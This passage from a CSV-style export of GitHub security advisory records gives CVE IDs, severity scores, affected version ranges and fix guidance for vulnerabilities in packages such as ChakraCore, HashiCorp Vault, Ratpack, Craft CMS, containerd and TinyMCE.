'1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0848'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0848'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:20:39Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-9vh5-r4qw-v3vv,2021-07-27T15:15:57Z,2021-07-28T17:57:46Z,,['CVE-2020-7220'],Improper Resource Shutdown or Release in HashiCorp Vault,"HashiCorp Vault Enterprise 0.11.0 through 1.3.1 fails, in certain circumstances, to revoke dynamic secrets for a mount in a deleted namespace. Fixed in 1.3.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7220'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#132-january-22nd-2020'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]","{'cwe_ids': ['CWE-404'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:15:57Z', 'nvd_published_at': '2020-01-23T18:15:00Z'}" +1.4.0,GHSA-w4wq-rvmq-77x7,2021-07-26T17:36:48Z,2021-07-26T21:23:58Z,,['CVE-2021-23411'],Cross-site scripting in anchorme,All versions of package anchorme are vulnerable to Cross-site Scripting (XSS) via the main functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'anchorme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23411'}, {'type': 'WEB', 'url': 'https://github.com/alexcorvi/anchorme.js/blob/gh-pages/src/transform.ts#23L81'}, {'type': 'WEB', 'url': 'https://github.com/alexcorvi/anchorme.js/blob/gh-pages/src/transform.ts%23L81'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1320695'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANCHORME-1311008'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:36:48Z', 'nvd_published_at': '2021-07-21T15:15:00Z'}" +1.4.0,GHSA-phj8-4cq3-794g,2021-09-01T19:32:49Z,2021-07-01T17:02:13Z,,['CVE-2021-29481'],Unencrypted storage of client side sessions,"### Impact + +The default configuration of client side sessions results in unencrypted, but signed, data being set as cookie values. This means that if something sensitive goes into the session, it could be read by something with access to the cookies. + +Note: the documentation does point this out and encourage users to add an encryption key, but it is not mandatory. + +For this to be a vulnerability, some kind of sensitive data would need to be stored in the session and the session cookie would have to leak. For example, the cookies are not configured with httpOnly and an adjacent XSS vulnerability within the site allowed capture of the cookies. + +The proposed change is to change the default behaviour to use a randomly generated encryption key. This would mean that sessions do not survive app restarts, but this is already the behaviour given the random signing key. + +### Patches + +As of version 1.9.0, a securely randomly generated signing key is used. + +### Workarounds + +Supply an encryption key, as per the documentation recommendation. + +### References + +- https://github.com/ratpack/ratpack/pull/1590 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-session'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-phj8-4cq3-794g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29481'}, {'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/pull/1590'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}]","{'cwe_ids': ['CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:48:41Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}" +1.4.0,GHSA-x2j7-6hxm-87p3,2023-09-21T19:51:08Z,2021-07-02T18:36:41Z,,['CVE-2021-27903'],Craft CMS Remote Code Injection,"An issue was discovered in Craft CMS before 3.6.7. In some circumstances, a potential Remote Code Execution vulnerability existed on sites that did not restrict administrative changes (if an attacker were somehow able to hijack an administrator's session).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27903'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c17728fa0bec11d3b82c34defe0930ed409aec38'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#367---2021-02-23'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#security'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:38:23Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}" +1.4.0,GHSA-w6rq-6h34-vh7q,2021-09-01T19:32:52Z,2021-07-01T17:02:38Z,,['CVE-2021-29479'],Cached redirect poisoning via X-Forwarded-Host header,"A user supplied `X-Forwarded-Host` header can be used to perform cache poisoning of a cache fronting a Ratpack server if the cache key does not include the `X-Forwarded-Host` header as a cache key. + +Users are only vulnerable if they do not configure a custom `PublicAddress` instance. A custom `PublicAddress` can be specified by using [ServerConfigBuilder::publicAddress](https://ratpack.io/manual/current/api/ratpack/server/ServerConfigBuilder.html#publicAddress-java.net.URI-). For versions prior to 1.9.0, by default, Ratpack utilizes an inferring version of `PublicAddress` which is vulnerable. + +### Impact + +This can be used to perform redirect cache poisoning where an attacker can force a cached redirect to redirect to their site instead of the intended redirect location. + +### Patches + +As of Ratpack 1.9.0, two changes have been made that mitigate this vulnerability: + +1. The default PublicAddress implementation no longer infers the address from the request context, instead relying on the configured bind host/port +2. Relative redirects issued by the application are no longer absolutized; they are passed through as-is + +### Workarounds + +In production, ensure that [ServerConfigBuilder::publicAddress](https://ratpack.io/manual/current/api/ratpack/server/ServerConfigBuilder.html#publicAddress-java.net.URI-) correctly configures the server. + +### References + - https://portswigger.net/web-security/web-cache-poisoning","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-w6rq-6h34-vh7q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29479'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://portswigger.net/web-security/web-cache-poisoning'}]","{'cwe_ids': ['CWE-807'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:50:31Z', 'nvd_published_at': '2021-06-29T15:15:00Z'}" +1.4.0,GHSA-3jxh-789f-p7m6,2023-09-21T19:21:04Z,2021-07-02T18:36:31Z,,['CVE-2021-27902'],Craft CMS Cross-site Scripting Vulnerability,"An issue was discovered in Craft CMS before 3.6.0. In some circumstances, a potential XSS vulnerability existed in connection with front-end forms that accepted user uploads.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27902'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/8ee85a8f03c143fa2420e7d6f311d95cae3b19ce'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#360---2021-01-26'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#security-1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:37:59Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}" +1.4.0,GHSA-gwrj-88fp-5m36,2023-01-24T15:09:14Z,2021-07-02T18:36:01Z,,['CVE-2021-35514'],Code injection in Narou,Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the title name or author name of a novel.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'narou'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35514'}, {'type': 'WEB', 'url': 'https://github.com/whiteleaf7/narou/commit/d07720e855293182563b749431dfbf6c2d1cdb42'}, {'type': 'PACKAGE', 'url': 'https://github.com/whiteleaf7/narou'}, {'type': 'WEB', 'url': 'https://github.com/whiteleaf7/narou/blob/develop/ChangeLog.md#380-20210627'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/51'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:42:19Z', 'nvd_published_at': '2021-06-28T12:15:00Z'}" +1.4.0,GHSA-c72p-9xmj-rx3w,2023-04-03T22:38:53Z,2021-07-26T21:17:45Z,,['CVE-2021-32760'],Archive package allows chmod of file outside of unpack target directory,"## Impact + +A bug was found in containerd where pulling and extracting a specially-crafted container image can result in Unix file permission changes for existing files in the host’s filesystem. Changes to file permissions can deny access to the expected owner of the file, widen access to others, or set extended bits like setuid, setgid, and sticky. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process. + +## Patches + +This bug has been fixed in containerd 1.5.4 and 1.4.8. Users should update to these versions as soon as they are released. Running containers do not need to be restarted. + +## Workarounds + +Ensure you only pull images from trusted sources. + +Linux security modules (LSMs) like SELinux and AppArmor can limit the files potentially affected by this bug through policies and profiles that prevent containerd from interacting with unexpected files. + +## For more information + +If you have any questions or comments about this advisory: + +* [Open an issue](https://github.com/containerd/containerd/issues/new/choose) +* Email us at security@containerd.io if you think you’ve found a security bug.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32760'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/22e9a70c71eff6507be71955947a611f2ed91e6c'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/7ad08c69e09ee4930a48dbf2aab3cd612458617f'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.8'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.4'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/'}]","{'cwe_ids': ['CWE-668', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:21:14Z', 'nvd_published_at': '2021-07-19T21:15:00Z'}" +1.4.0,GHSA-h4m4-pgp4-whgm,2022-10-25T20:25:48Z,2021-07-02T19:19:04Z,,['CVE-2021-32731'],The reset password form reveal users email address,"### Impact +The reset password form reveals the email address of users just by giving their username. + +### Patches +The problem has been patched on XWiki 13.2RC1. + +### Workarounds +It's possible to manually modify the `resetpasswordinline.vm` to perform the changes made in https://github.com/xwiki/xwiki-platform/commit/0cf716250b3645a5974c80d8336dcdf885749dff#diff-14a3132e3986b1f5606dd13d9d8a8bb8634bec9932123c5e49e9604cfd850fc2 + +### References +https://jira.xwiki.org/browse/XWIKI-18400 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Jira XWiki](https://jira.xiwki.org) +* Email us at [Security ML](mailto:security@xwiki.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.1'}, {'fixed': '13.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4m4-pgp4-whgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32731'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/0cf716250b3645a5974c80d8336dcdf885749dff#diff-14a3132e3986b1f5606dd13d9d8a8bb8634bec9932123c5e49e9604cfd850fc2'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18400'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:39:50Z', 'nvd_published_at': '2021-07-01T19:15:00Z'}" +1.4.0,GHSA-9pm8-xcj6-2m33,2021-07-28T19:18:32Z,2021-07-26T21:34:52Z,,['CVE-2020-12698'],Missing Authorization in TYPO3 extension,The direct_mail extension through 5.2.3 for TYPO3 has Broken Access Control for newsletter subscriber tables.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12698'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T20:48:53Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}" +1.4.0,GHSA-25gf-8qrr-g78r,2022-08-11T20:43:48Z,2021-07-19T21:21:03Z,,['CVE-2021-32574'],Hashicorp Consul Missing SSL Certificate Validation,HashiCorp Consul before 1.10.1 (and Consul Enterprise) has Missing SSL Certificate Validation. xds does not ensure that the Subject Alternative Name of an upstream is validated.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32574'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-17-consul-s-envoy-tls-configuration-did-not-validate-destination-service-subject-alternative-names/26856'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/releases/tag/v1.10.1'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-09'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T17:36:42Z', 'nvd_published_at': '2021-07-17T18:15:00Z'}" +1.4.0,GHSA-jv2c-mhcq-6wp4,2021-07-27T14:11:22Z,2021-07-28T18:57:39Z,,['CVE-2020-0829'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0829'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0829'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:11:22Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-wvhv-rr3v-vhpj,2021-07-27T14:26:27Z,2021-07-28T18:57:11Z,,['CVE-2020-0823'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0823'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0823'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:26:27Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-9pq7-rcxv-47vq,2021-07-15T20:24:43Z,2021-07-14T19:10:01Z,,['CVE-2021-27293'],Incorrect Regular Expression in RestSharp,"RestSharp < 106.11.8-alpha.0.13 uses a regular expression which is vulnerable to Regular Expression Denial of Service (ReDoS) when converting strings into DateTimes. If a server responds with a malicious string, the client using RestSharp will be stuck processing it for an exceedingly long time. Thus the remote server can trigger Denial of Service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'RestSharp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '106.11.8-alpha.0.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 106.11.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27293'}, {'type': 'WEB', 'url': 'https://github.com/restsharp/RestSharp/issues/1556'}, {'type': 'WEB', 'url': 'https://github.com/restsharp/RestSharp/commit/be39346784b68048b230790d15333574341143bc'}, {'type': 'WEB', 'url': 'https://restsharp.dev/'}]","{'cwe_ids': ['CWE-185', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T21:24:43Z', 'nvd_published_at': '2021-07-12T11:15:00Z'}" +1.4.0,GHSA-xcf7-q56x-78gh,2023-08-30T18:51:53Z,2021-07-26T21:23:49Z,,['CVE-2021-23409'],github.com/pires/go-proxyproto vulnerable to DoS via Connection descriptor exhaustion,"The package `github.com/pires/go-proxyproto` before 0.6.1 is vulnerable to Denial of Service (DoS) via creating connections without the proxy protocol header. While this issue was patched in 0.6.0, the fix introduced additional issues which were subsequently patched in 0.6.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pires/go-proxyproto'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23409'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/issues/65'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/issues/75'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/74'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/74/commits/cdc63867da24fc609b727231f682670d0d1cd346'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/76'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/commit/2e44d7a76a851d66890ab341403253afae5caac2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pires/go-proxyproto'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/releases/tag/v0.6.0'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/releases/tag/v0.6.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0233'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPIRESGOPROXYPROTO-1316439'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:31:53Z', 'nvd_published_at': '2021-07-21T07:15:00Z'}" +1.4.0,GHSA-mj9r-wwm8-7q52,2021-06-30T17:43:53Z,2021-07-01T17:00:32Z,,['CVE-2021-32721'],Open Redirect in github.com/AndrewBurian/powermux,"### Impact +Attackers may be able to craft phishing links and other open redirects by exploiting the trailing slash redirection feature. This may lead to users being redirected to untrusted sites after following an attacker crafted link. + +### Patches +The issue is resolved in v1.1.1 + +### Workarounds +There are no existing workarounds. +You may detect attempts to craft urls that exploit this feature by looking for request paths containing pairs of forward slashes in sequence combined with a trailing slash e.g. `https://example.com//foo/` +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/AndrewBurian/powermux'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/AndrewBurian/powermux/security/advisories/GHSA-mj9r-wwm8-7q52'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32721'}, {'type': 'WEB', 'url': 'https://github.com/AndrewBurian/powermux/commit/5e60a8a0372b35a898796c2697c40e8daabed8e9'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:43:53Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}" +1.4.0,GHSA-gp6m-vqhm-5cm5,2023-09-01T21:41:16Z,2021-07-02T18:37:31Z,,['CVE-2021-25951'],XML2Dict XML Entity Expansion Vulnerability,XXE vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service. The parse function does not properly restrict recursive entity references.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'XML2Dict'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25951'}, {'type': 'WEB', 'url': 'https://github.com/mcspring/XML2Dict/tree/master'}, {'type': 'WEB', 'url': 'https://pypi.org/project/XML2Dict/'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25951'}]","{'cwe_ids': ['CWE-611', 'CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:42:31Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}" +1.4.0,GHSA-r8hm-w5f7-wj39,2021-11-01T20:02:43Z,2021-11-02T15:42:52Z,,[],Cross-site scripting vulnerability in TinyMCE plugins,"### Impact +A cross-site scripting (XSS) vulnerability was discovered in the URL processing logic of the `image` and `link` plugins. The vulnerability allowed arbitrary JavaScript execution when updating an image or link using a specially crafted URL. This issue only impacted users while editing and the dangerous URLs were stripped in any content extracted from the editor. This impacts all users who are using TinyMCE 5.9.2 or lower. + +### Patches +This vulnerability has been patched in TinyMCE 5.10.0 by improved sanitization logic when updating URLs in the relevant plugins. + +### Workarounds +To work around this vulnerability, either: +- Upgrade to TinyMCE 5.10.0 or higher +- Disable the `image` and `link` plugins + +### Acknowledgements +Tiny Technologies would like to thank Yakir6 for discovering this vulnerability. + +### References +https://www.tiny.cloud/docs/release-notes/release-notes510/#securityfixes + +### For more information +If you have any questions or comments about this advisory: +* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud) +* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tinymce/tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'TinyMCE'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.10.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django-tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-r8hm-w5f7-wj39'}, {'type': 'WEB', 'url': 'https://github.com/jazzband/django-tinymce/issues/366'}, {'type': 'WEB', 'url': 'https://github.com/jazzband/django-tinymce/releases/tag/3.4.0'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymce/tinymce'}, {'type': 'WEB', 'url': 'https://pypi.org/project/django-tinymce/3.4.0/'}]","{'cwe_ids': ['CWE-64', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T20:02:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-92vm-mxjf-jqf3,2022-03-29T22:08:00Z,2021-11-10T20:41:39Z,,['CVE-2021-43572'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The `verify` function in the Stark Bank Python ECDSA library (starkbank-ecdsa) 2.0.0 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'starkbank-ecdsa'}, 'ecosystem_specific': {'affected_functions': ['ellipticcurve.ecdsa.Ecdsa.verify']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43572'}, {'type': 'WEB', 'url': 